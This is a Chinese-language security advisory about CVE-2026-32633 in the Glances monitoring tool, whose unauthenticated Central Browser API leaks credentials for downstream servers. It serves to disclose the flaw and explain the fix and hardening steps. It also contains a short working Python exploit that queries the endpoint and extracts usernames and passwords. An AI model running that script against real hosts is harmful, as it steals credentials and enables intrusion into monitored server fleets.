文章总结: 开源系统监控工具Glances存在严重凭证泄露漏洞CVE-2026-32633,CVSS评分9.1分。当以CentralBrowser模式运行且未启用密码保护时,攻击者可通过/api/4/serverslistAPI端点获取所有下游服务器的认证凭证。该漏洞已在4.5.2版本中修复,建议用户立即升级并使用–password参数启动服务。
综合评分: 85
文章分类: 漏洞分析,WEB安全,应用安全,数据泄露,安全建设
监控系统反被监控?Glances曝严重凭证泄露漏洞 CVE-2026-32633
原创
CVE-SEC
CVE-SEC
CVE-SEC
2026年3月20日 10:00
四川
监控系统反被监控?Glances曝严重凭证泄露漏洞
近日,开源系统监控工具Glances被曝存在严重凭证泄露漏洞(CVE-2026-32633),CVSS评分9.1分。当Glances运行在Central Browser模式且未启用密码保护时,攻击者可通过一个简单的API请求获取所有下游服务器的认证凭证。
漏洞背景
Glances是一款广受欢迎的跨平台系统监控工具,使用Python编写,支持实时监控CPU、内存、磁盘、网络等系统资源。其Central Browser模式允许管理员通过统一界面集中管理多台服务器的监控数据。
根据Shodan数据,全球有337个Glances实例暴露在公网,主要分布在美国(62个)、德国(43个)和法国(41个)。
漏洞原理
问题出在/api/4/serverslist端点。当配置了受密码保护的下游服务器时,Glances会将凭证嵌入到服务器URI中:
http://username:[email protected]:61208
而API端点直接返回了包含这些敏感信息的完整服务器对象:
# 漏洞代码
@app.route('/api/servers')
def get_servers():
return GlancesJSONResponse(
self.servers_list.get_servers_list() # 包含uri和password字段
)
当Browser实例未使用–password参数启动时,这个API端点完全无需认证即可访问。
影响范围
该漏洞的危害在于其连锁效应:
- 攻击者访问一个未受保护的Browser实例
- 获取所有下游服务器的凭证
- 使用凭证访问整个监控集群
- 如果配置了全局默认密码,整个监控网络沦陷
攻击演示
import requests
import re
def exploit(target):
url = f"http://{target}:61208/api/4/serverslist"
response = requests.get(url)
for server in response.json():
uri = server.get('uri', '')
# 解析嵌入式凭证
match = re.match(r'http://([^:]+):([^@]+)@(.+)', uri)
if match:
user, passwd, host = match.groups()
print(f"主机: {host}")
print(f"用户: {user}")
print(f"密码: {passwd}")
exploit("192.168.1.100")
修复方案
官方在4.5.2版本中修复了该漏洞,修复方案包括:
- 后端过滤敏感字段:
@staticmethod
def _sanitize_server(server):
safe = dict(server)
safe.pop('password', None)
safe.pop('uri', None)
return safe
- 前端使用安全字段构造URL:
// 不再使用可能包含凭证的uri
window.location.href = "http://" + server.name + ":" + server.port;
修复建议
- 立即升级至Glances 4.5.2:
pip install --upgrade glances
- 始终使用–password参数启动Glances:
glances -w --browser --password
- 使用防火墙限制61208端口访问
- 更换可能已泄露的凭证
安全启示
这个漏洞给我们几点警示:
- 监控系统本身也是重要的安全资产,需要同等级别的保护
- API设计时应遵循数据最小化原则,不返回不必要的敏感字段
- 默认配置往往不够安全,部署任何服务都应进行安全加固
- 凭证不应嵌入URL,应单独存储和传输
讽刺的是,用来监控系统安全的工具,自己却成了安全短板。
参考链接:
- https://github.com/nicolargo/glances/security/advisories/GHSA-r297-p3v4-wp8m
- https://github.com/nicolargo/glances/commit/879ef8688ffa1630839549751d3c7ef9961d361e
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:CVE-SEC CVE-SEC
CVE-SEC《监控系统反被监控?Glances曝严重凭证泄露漏洞 CVE-2026-32633》